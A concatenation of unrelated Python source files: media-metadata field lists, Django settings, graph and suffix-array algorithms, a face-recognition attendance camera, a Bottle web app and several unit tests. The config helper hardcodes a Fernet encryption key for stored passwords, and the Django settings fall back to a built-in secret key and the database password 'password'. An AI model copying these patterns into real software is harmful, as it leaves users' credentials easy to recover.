'Media/Part/Stream[@streamType=2]/@index'),
('Audio Stream Language Code',
'Media/Part/Stream[@streamType=2]/@languageCode')
]
# Define rows and element name for Special level 3 (one call pr. movie)
SLevel_3 = [
('Media ID',
'@ratingKey'),
('Rating',
'@rating'),
('Title',
'@title'),
('Year',
'@year'),
('Genres',
'Genre/@tag'),
('Country',
'Country/@tag'),
('Directors',
'Director/@tag'),
('Summary',
'@summary'),
('Subtitle Languages',
'Media/Part/Stream[@streamType=3]/@languageCode'),
('Subtitle Codec',
'Media/Part/Stream[@streamType=3]/@codec'),
('Subtitle Forced',
'Media/Part/Stream[@streamType=3]/@forced'),
('Video Resolution',
'Media/@videoResolution'),
('Bitrate',
'Media/@bitrate'),
('Audio Codec',
'Media/@audioCodec'),
('Video Codec',
'Media/@videoCodec'),
('Container',
'Media/@container'),
('MetaDB Link',
'@guid')
]
# Define rows and element name for Special level 4 (two call pr. movie)
SLevel_666 = [
]
# Define rows and element name for Special level 4 (two call pr. movie)
SLevel_666_2 = [
]
# Define rows and element name for PlayCount 1 (one calls pr. movie)
PlayCount_1 = [
('Media ID',
'@ratingKey'),
('Title',
'@title'),
('Total Playcount',
None),
('Added',
'@addedAt'),
('File Path',
'Media/Part/@file')
]
|
"""
Copyright © retnikt <[email protected]> 2020
This software is licensed under the MIT Licence: https://opensource.org/licenses/MIT
"""
from typing import TypedDict, cast
__all__ = ["NAME", "VERSION", "URL", "LICENCE", "LICENSE"]
class _Licence(TypedDict):
name: str
url: str
class _Author(TypedDict):
name: str
url: str
email: str
NAME: str = "Notebook"
VERSION: str = "0.1.0"
URL: str = "https://github.com/retnikt/notebook#readme"
LICENCE: _Licence = {
"name": "MIT",
"url": "https://opensource.org/licenses/mit-license.html",
}
class _MisspeltLicence: # pragma: no cover
"""descriptor to teach 330 million people how to spell licence."""
def __get__(self, instance, owner) -> str:
raise SyntaxError("learn to spell!")
LICENSE: str = cast(str, _MisspeltLicence())
|
"""
Django settings for back project.
Generated by 'django-admin startproject' using Django 3.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import os
import sys
from pathlib import Path
def get_from_env_or_file(var_name, default=None):
file_var_name = '%s_FILE' % var_name
path = os.environ.get(file_var_name)
if path and os.path.isfile(path):
with open(path, 'r') as f:
return f.read()
else:
return os.environ.get(var_name, default)
TEST = 'test' in sys.argv
COLLECTSTATIC = 'collectstatic' in sys.argv
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = get_from_env_or_file(
'DJANGO_SECRET_KEY',
'django-insecure-f)63a8(q@ykri+c1)=*y@5ma!ox%%@1dlgi2e@!v$952hlcdgx')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = os.environ.get('DJANGO_DEBUG', '').lower() == 'true'
ALLOWED_HOSTS = [
s.strip() for s in os.getenv(
'DJANGO_ALLOWED_HOSTS', '.shanty.social').split(',')
]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_extensions',
'django_celery_beat',
'djcelery_email',
'mail_templated',
'powerdns',
'rest_framework',
'drf_recaptcha',
'api',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'xff.middleware.XForwardedForMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
if DEBUG:
MIDDLEWARE.insert(2, 'whitenoise.middleware.WhiteNoiseMiddleware')
ROOT_URLCONF = 'back.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'back.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DJANGO_DB_PASSWORD = get_from_env_or_file('DJANGO_DB_PASSWORD', 'password')
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'HOST': os.environ.get('DJANGO_DB_HOST', 'db'),
'NAME': os.environ.get('DJANGO_DB_NAME', 'shanty'),
'USER': os.environ.get('DJANGO_DB_USER', 'user'),
'PASSWORD': DJANGO_DB_PASSWORD,
}
}
REDIS_HOST = os.getenv('DJANGO_REDIS_HOST', 'website-redis')
REDIS_PORT = int(os.getenv('DJANGO_REDIS_PORT', '6379'))
CACHES = {
'default': {
'BACKEND': 'django_redis.cache.RedisCache',
'LOCATION': f'redis://{REDIS_HOST}:{REDIS_PORT}/1',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.'
'UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.'
'MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.'
'CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.'
'NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = Path(BASE_DIR).joinpath('api', 'static')
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
AUTH_USER_MODEL = 'api.User'
SESSION_ENGINE = 'django.contrib.sessions.backends.cached_db'
CELERY_BROKER_URL = os.environ.get(
'CELERY_BROKER_URL', f'redis://{REDIS_HOST}:{REDIS_PORT}/0')
CELERY_RESULT_BACKEND = CELERY_BROKER_URL
CELERY_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_BEAT_SCHEDULER = os.environ.get(
'CELERY_BEAT_SCHEDULER',
'django_celery_beat.schedulers:DatabaseScheduler')
CELERY_COMMAND = ('celery', '-A', 'back', 'worker', '-l', 'info')
CELERY_AUTORELOAD = DEBUG
CELERY_ALWAYS_EAGER = TEST
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.SessionAuthentication',
'api.oauth.OAuth2Authentication',
),
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
)
}
EMAIL_BACKEND = os.environ.get(
'DJANGO_EMAIL_BACKEND', 'django.core.mail.backends.console.EmailBackend')
CELERY_EMAIL_BACKEND = 'django_mailjet.backends.MailjetBackend'
MAILJET_API_KEY = get_from_env_or_file('DJANGO_MAILJET_API_KEY', None)
MAILJET_API_SECRET = get_from_env_or_file('DJANGO_MAILJET_API_SECRET', None)
DEFAULT_FROM_EMAIL = '[email protected]'
EMAIL_CONFIRM_DAYS = 7
ACME_DIRECTORY_URL = 'http://pebble/'
ACME_KEY_BITS = 2048
ACME_PKEY_BITS = 2048
ADMIN_ENABLED = False
FIXTURE_DIRS = [
Path(BASE_DIR).joinpath('api', 'fixtures'),
]
DRF_RECAPTCHA_TESTING = TEST
DRF_RECAPTCHA_SECRET_KEY = get_from_env_or_file(
'DJANGO_RECAPTCHA_SECRET_KEY', None)
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
XFF_TRUSTED_PROXY_DEPTH = 1
XFF_NO_SPOOFING = True
AUTHLIB_OAUTH2_PROVIDER = {
'refresh_token_generator': True,
}
AUTHLIB_JWK = os.getenv('AUTHLIB_JWK', '/run/secrets/jwk')
AUTHLIB_JWK_PUB = os.getenv('AUTHLIB_JWK_PUB', '/run/secrets/jwk.pub')
AUTHLIB_OPENIDC_METADATA = {
"issuer": "http://shanty.social/",
"authorization_endpoint": "http://www.shanty.local:8000/api/oauth2/"
"authorize/",
"device_authorization_endpoint": "http://www.shanty.local:8000/api/oauth2/"
"device/code",
"token_endpoint": "http://www.shanty.local:8000/api/oauth2//token",
"userinfo_endpoint": "http://www.shanty.local:8000/api/users/whoami/",
"revocation_endpoint": "http://www.shanty.local:8000/api/oauth2/revoke",
"jwks_uri": "http://www.shanty.local:8000/api/oauth2/jwks/",
"response_types_supported": [
"code",
"token",
"id_token",
"code token",
"code id_token",
"token id_token",
"code token id_token",
"none"
],
"subject_types_supported": [
"public"
],
"id_token_signing_alg_values_supported": [
"RS256"
],
"scopes_supported": [
"openid",
"email",
"profile"
],
"token_endpoint_auth_methods_supported": [
"client_secret_post",
"client_secret_basic"
],
"claims_supported": [
"aud",
"email",
"email_verified",
"exp",
"family_name",
"given_name",
"iat",
"iss",
"locale",
"name",
"picture",
"sub"
],
"code_challenge_methods_supported": [
"plain",
"S256"
],
"grant_types_supported": [
"authorization_code",
"refresh_token",
"urn:ietf:params:oauth:grant-type:device_code",
"urn:ietf:params:oauth:grant-type:jwt-bearer"
]
}
SHARED_DOMAINS = os.getenv(
'DJANGO_SHARED_DOMAINS', 'shanty.social').split(',')
NAME_SERVERS = os.getenv(
'DJANGO_NAME_SERVERS', '1.1.1.1,8.8.8.8').split(',')
if COLLECTSTATIC:
STATICFILES_STORAGE = \
'compress_staticfiles.storage.CompressStaticFilesStorage'
BROTLI_STATIC_COMPRESSION = False
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse',
},
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue',
},
},
'formatters': {
'django.server': {
'()': 'django.utils.log.ServerFormatter',
'format': '[%(server_time)s] %(message)s',
}
},
'handlers': {
'console': {
'level': 'INFO',
'filters': ['require_debug_true'],
'class': 'logging.StreamHandler',
},
'console_debug_false': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'logging.StreamHandler',
},
'django.server': {
'level': 'INFO',
'class': 'logging.StreamHandler',
'formatter': 'django.server',
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django': {
'handlers': ['console', 'console_debug_false', 'mail_admins'],
'level': 'INFO',
},
'django.server': {
'handlers': ['django.server'],
'level': 'INFO',
'propagate': False,
}
}
}
SSH_HOST_KEYS = os.getenv('SSH_HOST_KEYS', '/run/secrets/ssh_host_*_key.pub')
|
def partition(graph, source):
"""
The function partitions a graph into two sets if bi-partite partitioning is possible
otherwise returns 'None'
"""
visited = dict()
for node in graph:
visited[node] = False
one = set()
two = set()
flag = True
queue1 = list()
queue2 = list()
queue1.append(source)
while len(queue1) > 0 or len(queue2) > 0:
if flag:
if len(queue1) != 0:
current = queue1.pop(0)
one.add(current)
## if current not in one:
## one.add(current)
## else:
## return None
else:
flag = not flag
continue
else:
if len(queue2) != 0:
current = queue2.pop(0)
two.add(current)
## if current not in two:
## two.add(current)
## else:
## return None
else:
flag = not flag
continue
visited[current] = True
adjacent = graph[current]
trimmed = [x for x in adjacent if not visited[x]]
if flag:
queue2 += trimmed
else:
queue1 += trimmed
flag = not flag
if len(one & two) == 0:
return (one, two)
else:
return None
g = {'a' : set('b'), 'b' : set('a')}
print partition(g, 'a')
h = {1 : set([4, 5]), 2 : set([4]), 3 : set([5, 6]), 4 : set([1, 2]), 5 : set([1, 3]), 6 : set([3])}
print partition(h, 5)
i = {1 : set([4, 5]), 2 : set([3, 4]), 3 : set([2, 5, 6]), 4 : set([1, 2]), 5 : set([1, 3]), 6 : set([3])}
print partition(i, 1)
|
from application import db
# class id(db.Model):
# id = db.Column(db.Integer, primary_key=True)
|
import pickle
from typing import Dict
from datetime import date as dt
import cv2
import imutils
import numpy as np
import face_recognition
from src.settings import (
DLIB_MODEL, DLIB_TOLERANCE,
ENCODINGS_FILE
)
from src.libs.base_camera import BaseCamera
from src.models import StudentModel, AttendanceModel
class RecognitionCamera(BaseCamera):
video_source = 0
# this class variable will help to process every other frame of video to save time
process_this_frame = True
@classmethod
def set_video_source(cls, source):
cls.video_source = source
@classmethod
def frames(cls):
print("[INFO] starting video stream...")
camera = cv2.VideoCapture(cls.video_source)
# store input video stream in camera variable
if not camera.isOpened():
raise RuntimeError('Could not start camera.')
print("[INFO] loading encodings...")
data = pickle.loads(open(ENCODINGS_FILE, "rb").read())
# print(len(data['encodings']) == len(data['ids']))
# create in dictionary for known students from database to avoid multiple queries
known_students = {}
while True:
# read current frame
_, img = camera.read()
yield cls.recognize_n_attendance(img, data, known_students)
@classmethod
def recognize_n_attendance(cls, frame: np.ndarray,
data: Dict, known_students: Dict) -> bytes:
# convert the input frame from BGR to RGB then resize it to have
# a width of 750px (to speedup processing)
rgb_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
rgb = imutils.resize(rgb_frame, width=750)
r = frame.shape[1] / float(rgb.shape[1])
boxes = []
encodings = []
names = []
# Only process every other frame of video to save time
if cls.process_this_frame:
# detect the (x, y)-coordinates of the bounding boxes
# corresponding to each face in the input frame, then compute
# the facial embeddings for each face
boxes = face_recognition.face_locations(rgb, model=DLIB_MODEL)
encodings = face_recognition.face_encodings(rgb, boxes)
# loop over the facial embeddings
for encoding in encodings:
# attempt to match each face in the input image to our known encodings
matches = face_recognition.compare_faces(data["encodings"], encoding, DLIB_TOLERANCE)
# name to be displayed on video
display_name = "Unknown"
# check to see if we have found a match
if True in matches:
# find the indexes of all matched faces then initialize a
# dictionary to count the total number of times each face
# was matched
matched_indexes = [i for (i, b) in enumerate(matches) if b]
counts = {}
# loop over the matched indexes and maintain a count for
# each recognized face
for matched_index in matched_indexes:
_id = data["ids"][matched_index]
counts[_id] = counts.get(_id, 0) + 1
# determine the recognized face with the largest number
# of votes (note: in the event of an unlikely tie Python
# will select first entry in the dictionary)
_id = max(counts, key=counts.get)
if _id:
if _id in known_students.keys():
# find matched student in the known_students by id
student = known_students[_id]
else:
# find matched student in the database by id
student = StudentModel.find_by_id(_id)
known_students[_id] = student
# if student's attendance is not marked
if not AttendanceModel.is_marked(dt.today(), student):
# then mark student's attendance
student_attendance = AttendanceModel(student=student)
# commit changes to database
student_attendance.save_to_db()
# update displayed name to student's name
display_name = student.name
# append the name to be displayed in names list
names.append(display_name)
cls.process_this_frame = not cls.process_this_frame
# loop over the recognized faces
for ((top, right, bottom, left), display_name) in zip(boxes, names):
if display_name == "Unknown":
continue
# rescale the face coordinates
top = int(top * r)
right = int(right * r)
bottom = int(bottom * r)
left = int(left * r)
top_left = (left, top)
bottom_right = (right, bottom)
# draw the predicted face name on the image
cv2.rectangle(frame, top_left, bottom_right, (0, 255, 0), 2)
y = top - 15 if top - 15 > 15 else top + 15
cv2.putText(frame, display_name, (left, y), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 255, 0), 2)
# display the output frames to the screen
return cv2.imencode('.jpg', frame)[1].tobytes()
|
from django.urls import path
from rest_framework.routers import SimpleRouter
from accounts.views import CreateUserView, LoginUserView
router = SimpleRouter()
router.register("accounts", CreateUserView)
urlpatterns = [
path("login/", LoginUserView.as_view()),
]
urlpatterns += router.urls
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Dataset conversion script
Author: Gertjan van den Burg
"""
import json
import argparse
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
"-s",
"--subsample",
help="Number of observations to skip during subsampling",
type=int,
)
parser.add_argument("input_file", help="File to convert")
parser.add_argument("output_file", help="File to write to")
return parser.parse_args()
def main():
args = parse_args()
with open(args.input_file, "r") as fp:
rows = [l.strip().split("\t") for l in fp]
time = []
values = []
for year, pop in rows:
time.append(year)
values.append(int(pop))
name = "centralia"
longname = "Centralia Pennsylvania Population"
time_fmt = "%Y"
series = [{"label": "Population", "type": "int", "raw": values}]
data = {
"name": name,
"longname": longname,
"n_obs": len(time),
"n_dim": len(series),
"time": {
"type": "string",
"format": time_fmt,
"index": list(range(len(time))),
"raw": time,
},
"series": series,
}
with open(args.output_file, "w") as fp:
json.dump(data, fp, indent="\t")
if __name__ == "__main__":
main()
|
from typing import List
import collections
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def findDuplicateSubtrees(self, root: TreeNode) -> List[TreeNode]:
trees = collections.defaultdict()
trees.default_factory = trees.__len__
count = collections.Counter()
ans = []
def lookup(node):
if node:
key = node.val, lookup(node.left), lookup(node.right)
uid = trees[key]
print(f'{key} => {uid}')
count[uid] += 1
if count[uid] == 2:
ans.append(node)
return uid
lookup(root)
return ans
import sys , os
sys.path.append(os.path.abspath('../TreeUtil'))
from util import drawtree , deserialize
root = deserialize('[1,2,3,4,null,2,4,null,null,4,null]')
# drawtree(root)
s = Solution()
a = s.findDuplicateSubtrees(root)
print(f'ans = {a}')
|
# Copyright (c) 2021, Stanford niversity
"""Tests for peak finder."""
import numpy as np
import pandas as pd
from util import peak_finder
from dataclasses import dataclass
from skimage.filters import gaussian
@dataclass()
class Point:
"""A class for defining a point in 3D."""
x: int
y: int
z: int
w: float
def test_peak_finder():
"""Test peak finder."""
x = np.zeros((20, 30, 30))
points = [
Point(5, 7, 4, 3000),
Point(10, 12, 10, 2000),
]
gt_df = pd.DataFrame(columns=["z", "y", "x"])
for i, p in enumerate(points):
x[p.z, p.y, p.x] = p.w
gt_df.loc[i] = [float(p.z), float(p.y), float(p.x)]
x = np.expand_dims(
gaussian(
x,
sigma=1.0,
),
axis=0,
)
est_df = peak_finder.peak_finder(
x, diameter=3, threshold=0, n_processes=1, preprocess=False
)
est_df = est_df.drop(
["mass", "size", "ecc", "signal", "ep", "frame", "raw_mass"], axis=1
).sort_values(by=["x"])
pd.testing.assert_frame_equal(gt_df, est_df, check_exact=False)
|
#!/usr/bin/env python
########################################################################
# FastGeneralizedSuffixArrays v0.1 #
# (c) 2011 Mark Mazumder #
# markmaz.com #
########################################################################
class Triple(object):
"""Represent each sortable character in R with three integers"""
#todo: input validation, errors
def __init__(self, T, idx, length):
t_i = lambda i: T[i] if i < length else 0
self._triple = (t_i(idx), t_i(idx + 1), t_i(idx + 2))
self._index = idx
self._rank = None
self._rpos = None
@property
def triple(self):
"""Character for R_k strings"""
return self._triple
@property
def index(self):
"""Position of R_k character in source string"""
return self._index
@property
def rpos(self):
"""Sorted order of R_k charcter"""
return self._rpos
@rpos.setter
def rpos(self, pos):
self._rpos = pos
@property
def rank(self):
"""Sorted order of R_k charcter"""
return self._rank
@rank.setter
def rank(self, pos):
self._rank = pos
def __repr__(self):
return "Triple({0}, {1}, {2})".format(self.triple, self.index, self.rank)
class NonsamplePair(object):
#todo: property decorators for validation
def __init__(self, T, idx, S_i_ranks):
self.index = idx
self.pair = None
max_index = len(T)
if idx < max_index:
self.pair = (T[self.index], S_i_ranks[self.index + 1])
else:
self.pair = (0, S_i_ranks[self.index + 1]) #defined to be 0 by KS algorithm
# Recursive Karkkainen-Sanders implementation
# Input: list of integers (representing characters)
# Returns suffix array for list
def ksa(T):
length = len(T) # n
# B_k = { i \in [0,n] | i mod 3 = k }
B_0, B_1, B_2 = xrange(0, length+1, 3), xrange(1, length+1, 3), xrange(2, length+1, 3)
#karkkainen-sanders step 1: sort sample suffixes
R_0 = [ Triple(T, idx, length) for idx in B_0 ]
R_1 = [ Triple(T, idx, length) for idx in B_1 ]
R_2 = [ Triple(T, idx, length) for idx in B_2 ]
R = R_1 + R_2
#enable reverse-lookup of characters in R from a list of sorted characters from R
for i, r_char in enumerate(R):
r_char.rpos = i
sorted_suffixes_R = sorted(R, key=lambda suffix_char: suffix_char.triple)
#Enables 0 as unique terminating character by starting ranks at 1
def rank_suffixes(suffixes, rank=1):
for i, suffix in enumerate(suffixes):
if i > 0 and suffix.triple != suffixes[i-1].triple:
rank += 1
suffix.rank = rank
return rank
rank = rank_suffixes(sorted_suffixes_R)
R_prime = [suffix.rank for suffix in R]
#recursive call
if (rank < len(R)): #we had repeats of characters of R, make a recursive call to sort
R_prime_suffix_array = ksa(R_prime)
else:
#directly form suffix array
R_prime_suffix_array = [len(R)] + [suffix.rpos for suffix in sorted_suffixes_R]
rank_Si = [None] * (length + 3) #why plus 3? -> additiionally define rank(S_(n+1) = rank(S_(n+2)) = 0
rank_Si[-2] = rank_Si[-1] = 0
#build rank(S_i) lookup array
for i, SAi in enumerate(R_prime_suffix_array):
if SAi < len(R): #ignore the index pointing to the terminating character of R_prime
rank_Si[R[SAi].index] = i
sorted_suffixes_R = [R[i] for i in R_prime_suffix_array[1:]]
#karkkainen-sanders step 2: sort nonsample suffixes
nonsample_suffix_pairs = [NonsamplePair(T, idx, rank_Si) for idx in B_0]
sorted_nonsample_suffix_pairs = sorted(nonsample_suffix_pairs, key=lambda p: p.pair)
#karkkainen-sanders step 3: merge
cur_Sc, cur_Sb0 = 0, 0
objs_SA = []
def getT(idx):
if idx < len(T):
return T[idx]
return 0
while cur_Sc < len(sorted_suffixes_R) and cur_Sb0 < len(sorted_nonsample_suffix_pairs):
i = sorted_suffixes_R[cur_Sc].index
j = sorted_nonsample_suffix_pairs[cur_Sb0].index
if i % 3 == 1: #i in B_1
#S_i =< S_j iff (T[i], rank(S_t+1) =< (t_j, rank(s_j+1))
if (getT(i), rank_Si[i+1]) < (getT(j), rank_Si[j+1]):
objs_SA.append(sorted_suffixes_R[cur_Sc])
cur_Sc += 1
else:
objs_SA.append(sorted_nonsample_suffix_pairs[cur_Sb0])
cur_Sb0 += 1
else: #i in B_2
if (getT(i), getT(i+1), rank_Si[i+2]) < (getT(j), getT(j+1), rank_Si[j+2]):
objs_SA.append(sorted_suffixes_R[cur_Sc])
cur_Sc += 1
else:
objs_SA.append(sorted_nonsample_suffix_pairs[cur_Sb0])
cur_Sb0 += 1
objs_SA += sorted_suffixes_R[cur_Sc:]
objs_SA += sorted_nonsample_suffix_pairs[cur_Sb0:]
SA = [suffix_object.index for suffix_object in objs_SA]
return SA
import sys
def main():
def inputerr():
print 'usage: python sa.py input_alphanumeric_string'
exit()
if len(sys.argv) != 2:
inputerr()
T = sys.argv[1].strip()
#if not T.isalnum():
# inputerr()
myT = []
for chr in T:
myT.append(ord(chr))
sa = ksa(myT)
print T
print ["{0:^2}".format(chr) for chr in T]
print ["{0:^2}".format(i) for i, chr in enumerate(T)]
print sa
if __name__ == '__main__':
main()
|
#!/usr/bin/env python3
import json, os
from cryptography.fernet import Fernet
key= b'FpOza5rnPiW1Jv1oJzF6Ef0LitGrZ2nyQcPCG5kYmFc='
fernet = Fernet(key)
def isConfig(path='config.json'):
return os.path.isfile(path)
def getConfig(path='config.json'):
if isConfig(path):
configFile= open(path, 'r')
configContent= configFile.read()
configFile.close()
configValues = json.loads(configContent)
if not 'myRoom' in configValues:
configValues['myRoom'] = None
if not 'myUsername' in configValues:
configValues['myUsername'] = None
if not 'myPassword' in configValues:
configValues['myPassword'] = None
if not 'myName' in configValues:
configValues['myName'] = None
# TODO: rest dazu
if type(configValues['myPassword']) is str:
configValues['myPassword'] = fernet.decrypt(configValues['myPassword'].encode()).decode()
return configValues
else:
return { 'myRoom': None, 'myUsername': None, 'myPassword': None, 'myName': None } # TODO: rest dazu
def setConfig(configValues, path='config.json'):
if type(configValues['myPassword']) is str:
configValues['myPassword'] = fernet.encrypt(configValues['myPassword'].encode()).decode()
configContent = json.dumps(configValues)
configFile= open(path, 'w')
configFile.write(configContent)
configFile.close()
|
import base64
import bottle
import os
import random
import time
from bottle import run, template, error, route, request, abort, static_file
from pymongo import Connection, errors
from pymongo.errors import ConnectionFailure
from utils.utils import get_domain
while True:
try:
connection = Connection(
os.environ.get('MONGODB_HOST', 'localhost'),
os.environ.get('MONGODB_PORT', 27017),
)
db = connection.mydatabase
break
except ConnectionFailure:
time.sleep(5)
ENVIRONMENT = os.environ.get('ENVIRONMENT', 'DEVELOPMENT')
@route('/api/random-generate/', method='GET')
def random_generate():
categories = [
'Amore', 'Soldi', 'Amici', 'Sport', 'Salute', 'Motto'
]
response_dict = {
"objects" : [],
"slug" : []
}
slug = ""
for category in categories:
entities = db['documents'].find({'Categoria':category})
count = db['documents'].find({'Categoria':category}).count()
n_random = random.randint(1,count)
i = 0
for entity in entities:
entity_random = entity
i = i + 1
if i == n_random:
break
slug = slug + "_" + str(entity_random["_id"])
response_dict["objects"].append({
"Categoria" : entity_random["Categoria"],
"Testo" : entity_random["Testo"],
})
response_dict["slug"] = base64.standard_b64encode(slug[1:].encode()).decode('UTF-8')
return response_dict
@route('/')
def index():
cta = [
'Escimi i buoni propositi',
'Generali adesso!',
'Iniziamo!',
'Vai!'
]
n_random = random.randint(0, 3)
cta_random = cta[n_random]
currentUrl = format(request.url)
domain = get_domain(currentUrl)
return template(
'views/index.tpl',
title="Homepage",
cta_random=cta_random,
domain=domain,
currentUrl = currentUrl
)
@route('/robots.txt')
def robotstxt():
from bottle import response
response.content_type = 'text/plain;'
return template(
'views/robots.tpl',
disallow='/' if ENVIRONMENT != "PRODUCTION" else ''
)
@route('/<slug>')
def page(slug):
try:
decoded_slug = base64.standard_b64decode(slug).decode()
ids_to_search = []
resolutions = {}
resolutions_from_db = db['documents'].find({"_id" :{
"$in" : decoded_slug.split('_')
}});
except Exception as ex:
return template('views/404.tpl')
for resolution in resolutions_from_db:
resolutions[resolution["Categoria"]] = resolution["Testo"]
currentUrl = format(request.url)
domain = get_domain(currentUrl)
shareTitle = "Buonipropositi 2020"
return template(
'views/buonipropositi.tpl',
title = 'Buoni Propositi Randomize',
resolutions = resolutions,
currentUrl = currentUrl,
shareTitle = shareTitle,
domain = domain,
)
@error(404)
def error404(error):
return template('views/404.tpl')
if ENVIRONMENT == "DEVELOPMENT":
@route('/images/<filename:re:.*\.png>')
def send_image(filename):
return static_file(filename, root='images', mimetype='image/png')
@route('/static/<filename:path>')
def send_static(filename):
return static_file(filename, root='assets')
@route('/static/favicon.ico')
def favicon():
print("aaa")
return send_static("/favicon.ico")
print ("Running in DEBUG mode with dev server....")
run(
host='0.0.0.0',
port=8080,
reloader=True,
debug=True
)
else:
print ("Running with gunicorn server....")
run(
host='0.0.0.0',
port=8080,
server='gunicorn',
workers=os.environ.get('WORKERS', 8),
reloader=False,
debug=False
)
|
import unittest
import numpy
import os
import sys
sys.path.insert(0, os.pardir)
sys.path.insert(0, os.path.join(os.pardir, 'openmoc'))
import openmoc
class TestMaterials(unittest.TestCase):
def setUp(self):
sigma_f = numpy.array([0.000625, 0.135416667])
nu_sigma_f = numpy.array([0.0015, 0.325])
sigma_s = numpy.array([[0.1, 0.117], [0., 1.42]])
chi = numpy.array([1.0, 0.0])
sigma_t = numpy.array([0.2208, 1.604])
self.test_material = openmoc.Material()
self.test_material.setName('2-group infinite medium')
self.test_material.setNumEnergyGroups(2)
self.test_material.setSigmaF(sigma_f)
self.test_material.setNuSigmaF(nu_sigma_f)
self.test_material.setSigmaS(sigma_s.flat)
self.test_material.setChi(chi)
self.test_material.setSigmaT(sigma_t)
def test_ids(self):
openmoc.reset_material_id()
material_2 = openmoc.Cell()
self.assertEqual(material_2.getId(), 1000000)
openmoc.maximize_material_id(10000000)
material_3 = openmoc.Cell()
self.assertEqual(material_3.getId(), 1000001)
self.test_material.printString()
def test_instances(self):
self.assertEqual(self.test_material.getNumInstances(), 0)
self.test_material.setNumInstances(99)
self.assertEqual(self.test_material.getNumInstances(), 99)
self.test_material.incrementNumInstances()
self.assertEqual(self.test_material.getNumInstances(), 100)
def test_fission_matrix(self):
material = openmoc.Material()
with self.assertRaises(Exception): material.buildFissionMatrix()
self.test_material.buildFissionMatrix()
self.assertAlmostEqual(self.test_material.getFissionMatrixByGroup(1,1), .0015)
self.assertAlmostEqual(self.test_material.getFissionMatrixByGroup(2,1), .325)
def test_volume(self):
self.test_material.setVolume(5)
self.assertEqual(self.test_material.getVolume(), 5)
self.test_material.incrementVolume(-2)
self.assertEqual(self.test_material.getVolume(), 3)
self.test_material.incrementVolume(2)
self.assertEqual(self.test_material.getVolume(), 5)
def test_get_cross_section_by_group(self):
self.assertAlmostEqual(self.test_material.getSigmaTByGroup(1), 0.2208)
self.assertAlmostEqual(self.test_material.getSigmaAByGroup(1), 0.0038)
self.assertAlmostEqual(self.test_material.getSigmaFByGroup(1), 0.000625)
self.assertAlmostEqual(self.test_material.getSigmaSByGroup(1, 1), 0.1)
self.assertAlmostEqual(self.test_material.getChiByGroup(1), 1.)
self.assertAlmostEqual(self.test_material.getNuSigmaFByGroup(1), 0.0015)
def test_get_cross_section(self):
material = openmoc.Material()
with self.assertRaises(Exception): material.getSigmaS()
with self.assertRaises(Exception): material.getSigmaA()
with self.assertRaises(Exception): material.getSigmaT()
with self.assertRaises(Exception): material.getSigmaF()
with self.assertRaises(Exception): material.getNuSigmaF()
def test_cross_section_alignment(self):
material = openmoc.Material()
with self.assertRaises(Exception): material.alignData()
self.test_material.alignData()
self.assertEqual(self.test_material.isDataAligned(), True)
self.assertEqual(self.test_material.getNumVectorGroups(), 1)
self.assertAlmostEqual(self.test_material.getSigmaTByGroup(1), 0.2208)
#FIXME SigmaA is not copied during alignment process
self.assertAlmostEqual(self.test_material.getSigmaAByGroup(1), 0.1208)
self.assertAlmostEqual(self.test_material.getSigmaFByGroup(1), 0.000625)
